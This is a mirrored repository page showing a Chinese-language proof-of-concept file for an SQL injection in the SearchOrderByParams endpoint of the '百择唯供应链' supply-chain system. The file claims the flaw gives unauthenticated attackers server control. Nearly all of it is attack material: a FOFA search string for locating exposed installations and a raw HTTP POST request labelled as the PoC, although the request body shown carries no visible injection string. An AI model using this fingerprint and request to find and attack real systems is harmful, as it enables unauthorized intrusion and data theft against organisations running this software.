admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/百择唯供应链/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

29 lines
784 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 百择唯供应链存在SearchOrderByParams存在SQL注入漏洞
百择唯供应链存在SearchOrderByParams SQL注入漏洞未经身份验证的攻击者通过漏洞执行任意代码从而获取到服务器权限。
## fofa
```javascript
body="/Content/Css/_SiteCss/"
```
## poc
```javascript
POST /M/SearchOrderByParams HTTP/1.1
Host:
Content-Length: 17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: 你的Cookie
Connection: keep-alive
Key=&SearchType=1
```
Reference in New Issue View Git Blame Copy Permalink